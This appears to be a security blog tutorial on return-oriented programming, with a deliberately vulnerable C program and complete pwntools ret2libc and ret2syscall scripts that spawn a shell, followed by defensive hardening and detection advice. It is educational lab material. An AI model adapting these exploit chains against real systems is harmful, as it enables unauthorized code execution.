Return-Oriented Programming (ROP) Fundamentals: From Gadgets to ret2syscall

Time it takes to read this article 6 minutes.

Disclaimer: This article is for education and authorized security testing only. Run every command against binaries you own or have explicit written permission to test (your own lab, CTF targets, or scoped engagements). Unauthorized exploitation of software is illegal in most jurisdictions.

Table of contents

Introduction / Overview
How it works / Background
Prerequisites / Lab setup
Walkthrough / PoC
Mermaid diagram
Detection & Defense (Blue Team)
Conclusion
References

Introduction / Overview

Return-Oriented Programming (ROP) is the canonical technique for defeating a non-executable stack (NX/DEP). When the stack is marked non-executable you can no longer drop shellcode onto it and jump to it. Instead, ROP reuses code that is already executable — small instruction sequences ending in ret called gadgets — and chains them together by controlling the saved return addresses on the stack. The CPU executes one gadget, hits ret, pops the next address you placed, and continues. The "program" you are running is a list of addresses, not bytes of your own code.

This post walks through the building blocks every exploit developer needs: finding gadgets with ROPgadget, the two classic payload shapes ret2libc and ret2syscall, and the stack pivot trick for when buffer space is tight. If you are new to memory corruption, the stack buffer overflow primer covers the prerequisite control-flow hijack.

How it works / Background

A gadget is a short sequence such as pop rdi ; ret. The trailing ret is what makes chaining possible: it pops the next 8 bytes (on x86-64) off the stack into RIP. By laying out values and gadget addresses carefully, you load registers, perform arithmetic, and ultimately invoke a function or a syscall.

Two payload styles dominate:

ret2libc — instead of injecting code, you redirect execution into an existing libc function such as system("/bin/sh"). You only need gadgets to set up arguments per the calling convention.
ret2syscall — you build a syscall invocation directly (e.g. execve("/bin/sh", NULL, NULL)), useful for statically linked binaries with no libc imports.

A stack pivot moves RSP to memory you control (a .bss buffer, a heap chunk, or a known data region) when the overflowed stack is too small to hold the full chain. Gadgets like xchg rsp, rax ; ret or leave ; ret accomplish this.

On x86-64 System V, integer arguments go in RDI, RSI, RDX, RCX, R8, R9. So a system("/bin/sh") call needs the address of the string in RDI — hence the ubiquitous hunt for pop rdi ; ret.

Prerequisites / Lab setup

Use an isolated Linux VM. Install the tooling:

sudo apt update
sudo apt install -y python3-pip gdb ROPgadget
pip3 install pwntools
# pwndbg makes gdb far more usable for pwn work
git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh

sudo apt update
sudo apt install -y python3-pip gdb ROPgadget
pip3 install pwntools
# pwndbg makes gdb far more usable for pwn work
git clone https://github.com/pwndbg/pwndbg && cd pwndbg && ./setup.sh

Bash

A deliberately vulnerable target compiled with NX on (the default) but no stack canary and no PIE so addresses stay fixed:

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <string.h>
void vuln(){ char buf[64]; read(0, buf, 256); }
int main(){ vuln(); return 0; }
EOF
gcc -fno-stack-protector -no-pie -o vuln vuln.c
checksec --file=./vuln    # expect NX enabled, PIE disabled

cat > vuln.c <<'EOF'
#include <stdio.h>
#include <string.h>
void vuln(){ char buf[64]; read(0, buf, 256); }
int main(){ vuln(); return 0; }
EOF
gcc -fno-stack-protector -no-pie -o vuln vuln.c
checksec --file=./vuln    # expect NX enabled, PIE disabled

Bash

Walkthrough / PoC

1. Find gadgets with ROPgadget

ROPgadget --binary ./vuln | head
# Hunt for the argument-setup gadget
ROPgadget --binary ./vuln | grep -E ": pop rdi ; ret"
# Find a place to write a string and the /bin/sh reference
ROPgadget --binary ./vuln --string "/bin/sh"

ROPgadget --binary ./vuln | head
# Hunt for the argument-setup gadget
ROPgadget --binary ./vuln | grep -E ": pop rdi ; ret"
# Find a place to write a string and the /bin/sh reference
ROPgadget --binary ./vuln --string "/bin/sh"

Bash

For a statically linked binary you will also want syscall and the register loaders:

ROPgadget --binary ./vuln --only "pop|ret"
ROPgadget --binary ./vuln | grep -E ": syscall"

ROPgadget --binary ./vuln --only "pop|ret"
ROPgadget --binary ./vuln | grep -E ": syscall"

Bash

2. ret2libc with pwntools

When libc is present and you can leak its base (or run locally with ASLR off), call system("/bin/sh"). The skeleton below uses pwntools to resolve symbols and assemble the chain:

from pwn import *

elf  = ELF('./vuln')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rop  = ROP(elf)

# Offset to saved RIP: 64-byte buf + 8-byte saved RBP
OFFSET = 72

pop_rdi  = rop.find_gadget(['pop rdi', 'ret'])[0]
ret      = rop.find_gadget(['ret'])[0]   # 16-byte stack alignment for movaps
binsh    = next(libc.search(b'/bin/sh'))
system   = libc.sym['system']

payload  = flat({
    OFFSET: [
        ret,        # align RSP to 16 bytes before the call
        pop_rdi, binsh,
        system,
    ]
})

p = process('./vuln')
p.send(payload)
p.interactive()

from pwn import *

elf  = ELF('./vuln')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
rop  = ROP(elf)

# Offset to saved RIP: 64-byte buf + 8-byte saved RBP
OFFSET = 72

pop_rdi  = rop.find_gadget(['pop rdi', 'ret'])[0]
ret      = rop.find_gadget(['ret'])[0]   # 16-byte stack alignment for movaps
binsh    = next(libc.search(b'/bin/sh'))
system   = libc.sym['system']

payload  = flat({
    OFFSET: [
        ret,        # align RSP to 16 bytes before the call
        pop_rdi, binsh,
        system,
    ]
})

p = process('./vuln')
p.send(payload)
p.interactive()

Python

The lone ret before system fixes a real-world footgun: modern libc uses movaps on a 16-byte-aligned stack, and an extra ret nudges alignment so the call does not SIGSEGV.

3. ret2syscall (static binary, no libc)

Here we synthesize execve("/bin/sh", 0, 0), which is syscall number 59 on x86-64:

from pwn import *

elf = ELF('./vuln_static')
rop = ROP(elf)

pop_rax = rop.find_gadget(['pop rax', 'ret'])[0]
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0]
syscall = rop.find_gadget(['syscall'])[0]
binsh   = next(elf.search(b'/bin/sh\x00'))   # or write it yourself into .bss

chain = flat({72: [
    pop_rdi, binsh,
    pop_rsi, 0,
    pop_rdx, 0,
    pop_rax, 59,        # __NR_execve
    syscall,
]})

p = process('./vuln_static')
p.send(chain)
p.interactive()

from pwn import *

elf = ELF('./vuln_static')
rop = ROP(elf)

pop_rax = rop.find_gadget(['pop rax', 'ret'])[0]
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
pop_rsi = rop.find_gadget(['pop rsi', 'ret'])[0]
pop_rdx = rop.find_gadget(['pop rdx', 'ret'])[0]
syscall = rop.find_gadget(['syscall'])[0]
binsh   = next(elf.search(b'/bin/sh\x00'))   # or write it yourself into .bss

chain = flat({72: [
    pop_rdi, binsh,
    pop_rsi, 0,
    pop_rdx, 0,
    pop_rax, 59,        # __NR_execve
    syscall,
]})

p = process('./vuln_static')
p.send(chain)
p.interactive()

Python

4. Stack pivot when space is tight

If the overflow only gives you a handful of bytes past RIP, stage the real chain elsewhere and pivot. A common pattern reads the full chain into .bss, then pivots RSP there:

bss      = elf.bss(0x200)
leave_ret= rop.find_gadget(['leave', 'ret'])[0]   # mov rsp, rbp ; pop rbp ; ret
# Stage 1: set RBP = bss-8, return into a read() that fills bss, then leave;ret

bss      = elf.bss(0x200)
leave_ret= rop.find_gadget(['leave', 'ret'])[0]   # mov rsp, rbp ; pop rbp ; ret
# Stage 1: set RBP = bss-8, return into a read() that fills bss, then leave;ret

Python

leave ; ret is equivalent to mov rsp, rbp ; pop rbp ; ret, so controlling the saved RBP lets you redirect RSP to your staged buffer. Other pivots include xchg rsp, rax ; ret and add rsp, 0x?? ; ret.

Mermaid diagram

Return-Oriented Programming (ROP) Fundamentals: From Gadgets to ret2syscall diagram 1

The diagram shows the decision flow from a hijacked return address to choosing ret2libc, ret2syscall, or a stack pivot depending on NX, libc availability, and buffer size.

Detection & Defense (Blue Team)

ROP exploits a gap left open when only the stack is non-executable. Layered defenses raise the cost sharply:

ASLR / PIE. Randomizing the base of libc, the heap, and the binary itself forces the attacker to leak addresses first. Always compile with -fPIE -pie and confirm system-wide ASLR: cat /proc/sys/kernel/randomize_va_space should be 2. PIE turns fixed pop rdi addresses into a leak-and-compute problem.
Stack canaries. -fstack-protector-strong (default on most distros) places a guard value before the saved return address; a linear overflow corrupts it and __stack_chk_fail aborts. This blocks the simplest path to RIP.
Full RELRO. -Wl,-z,relro,-z,now makes the GOT read-only, removing a popular write-what-where target used to bootstrap chains.
Control-Flow Integrity (CFI). Intel CET Shadow Stack keeps a protected copy of return addresses; a mismatch on ret faults, which directly breaks ROP's core mechanism. ARM offers Pointer Authentication (PAC) and BTI. Compile with -fcf-protection=full on supported toolchains.
Compiler hardening & FORTIFY. Build with -D_FORTIFY_SOURCE=3 -O2 to catch unsafe read/memcpy/strcpy patterns at runtime.
Detection. Map findings to MITRE ATT&CK T1055 (Process Injection) and T1203 (Exploitation for Client Execution). EDR/telemetry that flags execve of a shell from an unexpected parent, unusual mprotect calls flipping pages to RWX, or anomalous control flow (via ETW/hardware tracing) can surface ROP activity. Stack-pivot detection looks for RSP pointing outside the legitimate stack region at syscall entry.

For triage of a suspicious binary before any of this, see the Ghidra getting-started guide and the checksec hardening checklist.

Conclusion

ROP turns a binary's own bytes into an interpreter for attacker-supplied address lists. The fundamentals — locating gadgets with ROPgadget, staging arguments per the calling convention, choosing ret2libc versus ret2syscall, and pivoting when space runs out — compose into nearly every modern userland exploit. The same understanding tells defenders exactly which mitigation breaks the chain: canaries protect the return address, ASLR/PIE hides the gadgets, RELRO closes the GOT, and CET shadow stacks invalidate the ret primitive itself. Defense-in-depth is what makes ROP expensive.

References

MITRE ATT&CK — Exploitation for Client Execution (T1203): https://attack.mitre.org/techniques/T1203/
MITRE ATT&CK — Process Injection (T1055): https://attack.mitre.org/techniques/T1055/
HackTricks — ROP / Stack Pivoting: https://book.hacktricks.xyz/binary-exploitation/rop-return-oriented-programing
ROPgadget: https://github.com/JonathanSalwan/ROPgadget
pwntools documentation: https://docs.pwntools.com/
Intel CET (Control-flow Enforcement Technology) overview: https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html
Shacham, "The Geometry of Innocent Flesh on the Bone" (original ROP paper): https://hovav.net/ucsd/papers/s07.html

Introduction / Overview

How it works / Background

Prerequisites / Lab setup

Walkthrough / PoC

1. Find gadgets with ROPgadget

2. ret2libc with pwntools

3. ret2syscall (static binary, no libc)

4. Stack pivot when space is tight

Mermaid diagram

Detection & Defense (Blue Team)

Conclusion

References

Comments